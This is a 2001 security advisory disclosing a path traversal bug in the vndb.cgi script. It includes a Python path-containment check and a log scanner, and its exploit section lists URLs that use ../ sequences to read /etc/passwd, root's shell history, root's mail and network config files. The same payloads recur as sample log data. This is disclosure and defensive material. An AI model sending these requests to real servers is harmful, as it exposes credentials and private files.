
vndb.cgi can display arbitrary files




Tuxtendo Security Advisory
(c) 2001 Tuxtendo
E-Mail: security@tuxtendo.nl
WWW   : http://www.tuxtendo.nl
-------------------------------->


---------------------------
1. Program information
---------------------------
Program Name    : vndb.cgi
Description     : vndb.cgi is a CGI script which shows files by category.
Vendor          : http://www.vang.net
Program purpose : Normally it's used to show *.html files
Bug Found by    : Noxious ( noxious@tuxtendo.nl )
Tuxtendo ID     : TXN-0108-2001-TX01
Date            : 01-08-2001

---------------------------
2. Problem Description
---------------------------
Normally vndb.cgi is used to show .html files. The programmer has set the
root path wrong, so the path built from the request parameters can be
escaped with ../ sequences and used to view any file the web server
process is allowed to read.
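The following is an added example, not the vndb.cgi source (which is not
on this page): it shows the containment check a script of this kind needs
when it joins user-supplied "cat" and "template" parameters onto a base
directory, and a small scanner that flags traversal attempts in access-log
lines. The base directory, the helper names and the log lines are all
constructed for the example.

```python
import posixpath
import re
from urllib.parse import parse_qs

# Constructed base directory; the real vndb.cgi layout is not on the page.
TEMPLATE_ROOT = "/var/www/vndb/templates"


def safe_join(root, *parts):
    """Join root with user-controlled path parts and return the result only
    if it stays inside root after lexical normalization; otherwise None."""
    for p in parts:
        # Empty parameters, absolute paths and NUL bytes are never valid here.
        if not p or p.startswith("/") or "\x00" in p:
            return None
    rel = posixpath.normpath(posixpath.join(*parts))
    # normpath collapses "a/../b" to "b"; a result that still begins with
    # ".." (or is "." or "..") would point outside root.
    if rel in (".", "..") or rel.startswith("../"):
        return None
    return posixpath.join(root, rel)


def resolve_request(query, root=TEMPLATE_ROOT):
    """Resolve a vndb.cgi-style query string (template=...&cat=...) to a
    file path under root, or None if the request must be refused.
    parse_qs percent-decodes, so %2e%2e is seen as '..' as well."""
    params = parse_qs(query, keep_blank_values=True)
    cat = params.get("cat", [""])[0]
    template = params.get("template", [""])[0]
    return safe_join(root, cat, template)


# Constructed sample access-log entries (common log format).
LOG_LINES = [
    '10.0.0.5 - - [01/Aug/2001:12:00:01 +0200] '
    '"GET /cgi-bin/vndb.cgi?template=index.html&cat=news HTTP/1.0" 200 1532',
    '10.0.0.9 - - [01/Aug/2001:12:00:07 +0200] '
    '"GET /cgi-bin/vndb.cgi?template=../../../../../../etc/passwd&cat=../ HTTP/1.0" 200 881',
    '10.0.0.9 - - [01/Aug/2001:12:00:09 +0200] '
    '"GET /cgi-bin/vndb.cgi?template=%2e%2e/%2e%2e/etc/hosts.allow&cat=%2e%2e%2f HTTP/1.0" 200 120',
]

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def traversal_attempts(lines):
    """Return the log lines whose vndb.cgi request would have been refused
    by resolve_request, i.e. requests that try to leave the template root."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        if not path.endswith("/vndb.cgi"):
            continue
        if resolve_request(query) is None:
            hits.append(line)
    return hits


if __name__ == "__main__":
    print(resolve_request("template=index.html&cat=news"))
    print(resolve_request("template=../../../../../../etc/passwd&cat=../"))
    for hit in traversal_attempts(LOG_LINES):
        print("traversal attempt:", hit)
```

The check is purely lexical, which is enough to stop ../ escapes; if the
template directory may contain symlinks pointing outside it, a deployment
should additionally compare os.path.realpath of the final path against the
realpath of the root.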


---------------------------
3. Exploit
---------------------------
http://www.server.com/cgi-bin/vndb.cgi?template=../../../../../../etc/passwd&cat=../
http://www.server.com/cgi-bin/vndb.cgi?template=../../../../../../root/.bash_history&cat=../
http://www.server.com/cgi-bin/vndb.cgi?template=../../../../../../var/spool/mail/root&cat=../
http://www.server.com/cgi-bin/vndb.cgi?template=../../../../../../etc/inetd.conf&cat=../
http://www.server.com/cgi-bin/vndb.cgi?template=../../../../../../etc/hosts.allow&cat=../



---------------------------
4. Solution
---------------------------
Use another script; check www.hotscripts.com for alternatives.


---------------------------
5. Vendor status
---------------------------
The vendor was contacted multiple times but gave no response whatsoever.


------------------------------------>
DISCLAIMER:
This advisory does not claim to be complete or to be usable for any purpose.
In particular, information on the vulnerable systems may be inaccurate.
Any supplied exploit code is not to be used for malicious purposes, but for
educational purposes only.
This advisory is free for open distribution in unmodified form.
Articles that are based on information from this advisory should include a link to
www.tuxtendo.nl
------------------------------------>
For more information regarding this bug, or for other information, e-mail:
security@tuxtendo.nl
